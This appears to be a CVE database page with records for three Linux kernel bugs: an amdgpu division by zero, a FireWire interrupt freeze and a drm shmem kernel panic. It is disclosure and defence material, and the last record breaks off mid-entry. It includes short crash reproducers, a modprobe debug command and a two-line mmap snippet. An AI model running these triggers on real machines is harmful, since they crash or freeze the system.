In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Fix division by zero in setup_dsc_config When slice_height is 0, the division by slice_height in the calculation of the number of slices will cause a division by zero driver crash. This leaves the kernel in a state that requires a reboot. This patch adds a check to avoid the division by zero. The stack trace below is for the 6.8.4 Kernel. I reproduced the issue on a Z16 Gen 2 Lenovo Thinkpad with a Apple Studio Display monitor connected via Thunderbolt. The amdgpu driver crashed with this exception when I rebooted the system with the monitor connected. kernel: ? die (arch/x86/kernel/dumpstack.c:421 arch/x86/kernel/dumpstack.c:434 arch/x86/kernel/dumpstack.c:447) kernel: ? do_trap (arch/x86/kernel/traps.c:113 arch/x86/kernel/traps.c:154) kernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu kernel: ? do_error_trap (./arch/x86/include/asm/traps.h:58 arch/x86/kernel/traps.c:175) kernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu kernel: ? exc_divide_error (arch/x86/kernel/traps.c:194 (discriminator 2)) kernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu kernel: ? asm_exc_divide_error (./arch/x86/include/asm/idtentry.h:548) kernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu kernel: dc_dsc_compute_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1109) amdgpu After applying this patch, the driver no longer crashes when the monitor is connected and the system is rebooted. I believe this is the same issue reported for 3113.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a32c8f951c8a456c1…
	https://git.kernel.org/stable/c/91402e0e5de9124a3…
	https://git.kernel.org/stable/c/7e4f50dfc98c49b3d…
	https://git.kernel.org/stable/c/f187fcbbb8f8bf10c…
	https://git.kernel.org/stable/c/308de6be0c9c7ba36…
	https://git.kernel.org/stable/c/130afc8a886183a94…

Impacted products

Vendor

Product

Version

Linux

Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < a32c8f951c8a456c1c251e1dcdf21787f8066445 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 91402e0e5de9124a3108db7a14163fcf9a6d322f (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 7e4f50dfc98c49b3dc6875a35c3112522fb25639 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < f187fcbbb8f8bf10c6687f0beae22509369f7563 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 308de6be0c9c7ba36915c0d398e771725c0ea911 (git)
Affected: 4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c , < 130afc8a886183a94cf6eab7d24f300014ff87ba (git)

Linux

Affected: 4.15
Unaffected: 0 , < 4.15 (semver)
Unaffected: 5.15.160 , ≤ 5.15.* (semver)
Unaffected: 6.1.92 , ≤ 6.1.* (semver)
Unaffected: 6.6.32 , ≤ 6.6.* (semver)
Unaffected: 6.8.11 , ≤ 6.8.* (semver)
Unaffected: 6.9.2 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36969",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-10T18:44:38.607815Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-10T18:44:52.492Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.535Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a32c8f951c8a456c1c251e1dcdf21787f8066445"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/91402e0e5de9124a3108db7a14163fcf9a6d322f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e4f50dfc98c49b3dc6875a35c3112522fb25639"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f187fcbbb8f8bf10c6687f0beae22509369f7563"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/308de6be0c9c7ba36915c0d398e771725c0ea911"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/130afc8a886183a94cf6eab7d24f300014ff87ba"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a32c8f951c8a456c1c251e1dcdf21787f8066445",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "91402e0e5de9124a3108db7a14163fcf9a6d322f",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "7e4f50dfc98c49b3dc6875a35c3112522fb25639",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "f187fcbbb8f8bf10c6687f0beae22509369f7563",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "308de6be0c9c7ba36915c0d398e771725c0ea911",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            },
            {
              "lessThan": "130afc8a886183a94cf6eab7d24f300014ff87ba",
              "status": "affected",
              "version": "4562236b3bc0a28aeb6ee93b2d8a849a4c4e1c7c",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/display/dc/dsc/dc_dsc.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.15"
            },
            {
              "lessThan": "4.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.160",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.92",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.32",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.160",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.92",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.32",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.11",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.2",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "4.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/display: Fix division by zero in setup_dsc_config\n\nWhen slice_height is 0, the division by slice_height in the calculation\nof the number of slices will cause a division by zero driver crash. This\nleaves the kernel in a state that requires a reboot. This patch adds a\ncheck to avoid the division by zero.\n\nThe stack trace below is for the 6.8.4 Kernel. I reproduced the issue on\na Z16 Gen 2 Lenovo Thinkpad with a Apple Studio Display monitor\nconnected via Thunderbolt. The amdgpu driver crashed with this exception\nwhen I rebooted the system with the monitor connected.\n\nkernel: ? die (arch/x86/kernel/dumpstack.c:421 arch/x86/kernel/dumpstack.c:434 arch/x86/kernel/dumpstack.c:447)\nkernel: ? do_trap (arch/x86/kernel/traps.c:113 arch/x86/kernel/traps.c:154)\nkernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu\nkernel: ? do_error_trap (./arch/x86/include/asm/traps.h:58 arch/x86/kernel/traps.c:175)\nkernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu\nkernel: ? exc_divide_error (arch/x86/kernel/traps.c:194 (discriminator 2))\nkernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu\nkernel: ? asm_exc_divide_error (./arch/x86/include/asm/idtentry.h:548)\nkernel: ? setup_dsc_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1053) amdgpu\nkernel: dc_dsc_compute_config (drivers/gpu/drm/amd/amdgpu/../display/dc/dsc/dc_dsc.c:1109) amdgpu\n\nAfter applying this patch, the driver no longer crashes when the monitor\nis connected and the system is rebooted. I believe this is the same\nissue reported for 3113."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:19:47.597Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a32c8f951c8a456c1c251e1dcdf21787f8066445"
        },
        {
          "url": "https://git.kernel.org/stable/c/91402e0e5de9124a3108db7a14163fcf9a6d322f"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e4f50dfc98c49b3dc6875a35c3112522fb25639"
        },
        {
          "url": "https://git.kernel.org/stable/c/f187fcbbb8f8bf10c6687f0beae22509369f7563"
        },
        {
          "url": "https://git.kernel.org/stable/c/308de6be0c9c7ba36915c0d398e771725c0ea911"
        },
        {
          "url": "https://git.kernel.org/stable/c/130afc8a886183a94cf6eab7d24f300014ff87ba"
        }
      ],
      "title": "drm/amd/display: Fix division by zero in setup_dsc_config",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36969",
    "datePublished": "2024-06-08T12:53:01.353Z",
    "dateReserved": "2024-05-30T15:25:07.081Z",
    "dateUpdated": "2025-07-11T17:19:47.597Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-36950 (GCVE-0-2024-36950)

Vulnerability from cvelistv5 – Published: 2024-05-30 15:35 – Updated: 2026-01-05 10:36

Title

firewire: ohci: mask bus reset interrupts between ISR and bottom half

Summary

In the Linux kernel, the following vulnerability has been resolved: firewire: ohci: mask bus reset interrupts between ISR and bottom half In the FireWire OHCI interrupt handler, if a bus reset interrupt has occurred, mask bus reset interrupts until bus_reset_work has serviced and cleared the interrupt. Normally, we always leave bus reset interrupts masked. We infer the bus reset from the self-ID interrupt that happens shortly thereafter. A scenario where we unmask bus reset interrupts was introduced in 2008 in a007bb857e0b26f5d8b73c2ff90782d9c0972620: If OHCI_PARAM_DEBUG_BUSRESETS (8) is set in the debug parameter bitmask, we will unmask bus reset interrupts so we can log them. irq_handler logs the bus reset interrupt. However, we can't clear the bus reset event flag in irq_handler, because we won't service the event until later. irq_handler exits with the event flag still set. If the corresponding interrupt is still unmasked, the first bus reset will usually freeze the system due to irq_handler being called again each time it exits. This freeze can be reproduced by loading firewire_ohci with "modprobe firewire_ohci debug=-1" (to enable all debugging output). Apparently there are also some cases where bus_reset_work will get called soon enough to clear the event, and operation will continue normally. This freeze was first reported a few months after a007bb85 was committed, but until now it was never fixed. The debug level could safely be set to -1 through sysfs after the module was loaded, but this would be ineffectual in logging bus reset interrupts since they were only unmasked during initialization. irq_handler will now leave the event flag set but mask bus reset interrupts, so irq_handler won't be called again and there will be no freeze. If OHCI_PARAM_DEBUG_BUSRESETS is enabled, bus_reset_work will unmask the interrupt after servicing the event, so future interrupts will be caught as desired. As a side effect to this change, OHCI_PARAM_DEBUG_BUSRESETS can now be enabled through sysfs in addition to during initial module loading. However, when enabled through sysfs, logging of bus reset interrupts will be effective only starting with the second bus reset, after bus_reset_work has executed.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b3948c69d60279fce…
	https://git.kernel.org/stable/c/31279bbca40d2f40c…
	https://git.kernel.org/stable/c/fa273f312334246c9…
	https://git.kernel.org/stable/c/4f9cc355c328fc4f4…
	https://git.kernel.org/stable/c/6fafe3661712b143d…
	https://git.kernel.org/stable/c/5982887de60c1b84f…
	https://git.kernel.org/stable/c/8643332aac0576581…
	https://git.kernel.org/stable/c/752e3c53de0fa3b7d…

Impacted products

Vendor

Product

Version

Linux

Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < b3948c69d60279fce5b2eeda92a07d66296c8130 (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 31279bbca40d2f40cb3bbb6d538ec9620a645dec (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < fa273f312334246c909475c5868e6daab889cc8c (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 4f9cc355c328fc4f41cbd9c4cd58b235184fa420 (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 6fafe3661712b143d9c69a7322294bd53f559d5d (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 5982887de60c1b84f9c0ca07c835814d07fd1da0 (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 8643332aac0576581cfdf01798ea3e4e0d624b61 (git)
Affected: a007bb857e0b26f5d8b73c2ff90782d9c0972620 , < 752e3c53de0fa3b7d817a83050b6699b8e9c6ec9 (git)

Linux

Affected: 2.6.26
Unaffected: 0 , < 2.6.26 (semver)
Unaffected: 4.19.314 , ≤ 4.19.* (semver)
Unaffected: 5.4.276 , ≤ 5.4.* (semver)
Unaffected: 5.10.217 , ≤ 5.10.* (semver)
Unaffected: 5.15.159 , ≤ 5.15.* (semver)
Unaffected: 6.1.91 , ≤ 6.1.* (semver)
Unaffected: 6.6.31 , ≤ 6.6.* (semver)
Unaffected: 6.8.10 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-36950",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-04T15:34:28.122404Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-20T14:13:44.582Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:43:50.561Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b3948c69d60279fce5b2eeda92a07d66296c8130"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/31279bbca40d2f40cb3bbb6d538ec9620a645dec"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fa273f312334246c909475c5868e6daab889cc8c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4f9cc355c328fc4f41cbd9c4cd58b235184fa420"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6fafe3661712b143d9c69a7322294bd53f559d5d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5982887de60c1b84f9c0ca07c835814d07fd1da0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8643332aac0576581cfdf01798ea3e4e0d624b61"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/752e3c53de0fa3b7d817a83050b6699b8e9c6ec9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/firewire/ohci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b3948c69d60279fce5b2eeda92a07d66296c8130",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "31279bbca40d2f40cb3bbb6d538ec9620a645dec",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "fa273f312334246c909475c5868e6daab889cc8c",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "4f9cc355c328fc4f41cbd9c4cd58b235184fa420",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "6fafe3661712b143d9c69a7322294bd53f559d5d",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "5982887de60c1b84f9c0ca07c835814d07fd1da0",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "8643332aac0576581cfdf01798ea3e4e0d624b61",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            },
            {
              "lessThan": "752e3c53de0fa3b7d817a83050b6699b8e9c6ec9",
              "status": "affected",
              "version": "a007bb857e0b26f5d8b73c2ff90782d9c0972620",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/firewire/ohci.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.26"
            },
            {
              "lessThan": "2.6.26",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.314",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.276",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.217",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.159",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.91",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.31",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.10",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.314",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.276",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.217",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.159",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.91",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.31",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.10",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.26",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfirewire: ohci: mask bus reset interrupts between ISR and bottom half\n\nIn the FireWire OHCI interrupt handler, if a bus reset interrupt has\noccurred, mask bus reset interrupts until bus_reset_work has serviced and\ncleared the interrupt.\n\nNormally, we always leave bus reset interrupts masked. We infer the bus\nreset from the self-ID interrupt that happens shortly thereafter. A\nscenario where we unmask bus reset interrupts was introduced in 2008 in\na007bb857e0b26f5d8b73c2ff90782d9c0972620: If\nOHCI_PARAM_DEBUG_BUSRESETS (8) is set in the debug parameter bitmask, we\nwill unmask bus reset interrupts so we can log them.\n\nirq_handler logs the bus reset interrupt. However, we can\u0027t clear the bus\nreset event flag in irq_handler, because we won\u0027t service the event until\nlater. irq_handler exits with the event flag still set. If the\ncorresponding interrupt is still unmasked, the first bus reset will\nusually freeze the system due to irq_handler being called again each\ntime it exits. This freeze can be reproduced by loading firewire_ohci\nwith \"modprobe firewire_ohci debug=-1\" (to enable all debugging output).\nApparently there are also some cases where bus_reset_work will get called\nsoon enough to clear the event, and operation will continue normally.\n\nThis freeze was first reported a few months after a007bb85 was committed,\nbut until now it was never fixed. The debug level could safely be set\nto -1 through sysfs after the module was loaded, but this would be\nineffectual in logging bus reset interrupts since they were only\nunmasked during initialization.\n\nirq_handler will now leave the event flag set but mask bus reset\ninterrupts, so irq_handler won\u0027t be called again and there will be no\nfreeze. If OHCI_PARAM_DEBUG_BUSRESETS is enabled, bus_reset_work will\nunmask the interrupt after servicing the event, so future interrupts\nwill be caught as desired.\n\nAs a side effect to this change, OHCI_PARAM_DEBUG_BUSRESETS can now be\nenabled through sysfs in addition to during initial module loading.\nHowever, when enabled through sysfs, logging of bus reset interrupts will\nbe effective only starting with the second bus reset, after\nbus_reset_work has executed."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:36:28.444Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b3948c69d60279fce5b2eeda92a07d66296c8130"
        },
        {
          "url": "https://git.kernel.org/stable/c/31279bbca40d2f40cb3bbb6d538ec9620a645dec"
        },
        {
          "url": "https://git.kernel.org/stable/c/fa273f312334246c909475c5868e6daab889cc8c"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f9cc355c328fc4f41cbd9c4cd58b235184fa420"
        },
        {
          "url": "https://git.kernel.org/stable/c/6fafe3661712b143d9c69a7322294bd53f559d5d"
        },
        {
          "url": "https://git.kernel.org/stable/c/5982887de60c1b84f9c0ca07c835814d07fd1da0"
        },
        {
          "url": "https://git.kernel.org/stable/c/8643332aac0576581cfdf01798ea3e4e0d624b61"
        },
        {
          "url": "https://git.kernel.org/stable/c/752e3c53de0fa3b7d817a83050b6699b8e9c6ec9"
        }
      ],
      "title": "firewire: ohci: mask bus reset interrupts between ISR and bottom half",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36950",
    "datePublished": "2024-05-30T15:35:46.262Z",
    "dateReserved": "2024-05-30T15:25:07.079Z",
    "dateUpdated": "2026-01-05T10:36:28.444Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39497 (GCVE-0-2024-39497)

Vulnerability from cvelistv5 – Published: 2024-07-12 12:20 – Updated: 2025-11-03 21:56

Title

drm/shmem-helper: Fix BUG_ON() on mmap(PROT_WRITE, MAP_PRIVATE)

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/shmem-helper: Fix BUG_ON() on mmap(PROT_WRITE, MAP_PRIVATE) Lack of check for copy-on-write (COW) mapping in drm_gem_shmem_mmap allows users to call mmap with PROT_WRITE and MAP_PRIVATE flag causing a kernel panic due to BUG_ON in vmf_insert_pfn_prot: BUG_ON((vma->vm_flags & VM_PFNMAP) && is_cow_mapping(vma->vm_flags)); Return -EINVAL early if COW mapping is detected. This bug affects all drm drivers using default shmem helpers. It can be reproduced by this simple example: void *ptr = mmap(0, size, PROT_WRITE, MAP_PRIVATE, fd, mmap_offset); ptr[0] = 0;

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a508a102edf8735ad…
	https://git.kernel.org/stable/c/3ae63a8c1685e1695…
	https://git.kernel.org/stable/c/2219e5f97244b79c2…
	https://git.kernel.org/stable/c/1b4a8b89bf6787090…
	https://git.kernel.org/stable/c/03c71c42809ef4b17…
	https://git.kernel.org/stable/c/39bc27bd688066a63…

Impacted products

Vendor

Product

Version

Linux

Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < a508a102edf8735adc9bb73d37dd13c38d1a1b10 (git)
Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < 3ae63a8c1685e16958560ec08d30defdc5b9cca0 (git)
Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < 2219e5f97244b79c276751a1167615b9714db1b0 (git)
Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < 1b4a8b89bf6787090b56424d269bf84ba00c3263 (git)
Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < 03c71c42809ef4b17f5d874cdb2d3bf40e847b86 (git)
Affected: 2194a63a818db71065ebe09c8104f5f021ca4e7b , < 39bc27bd688066a63e56f7f64ad34fae03fbe3b8 (git)

Linux

Affected: 5.2
Unaffected: 0 , < 5.2 (semver)
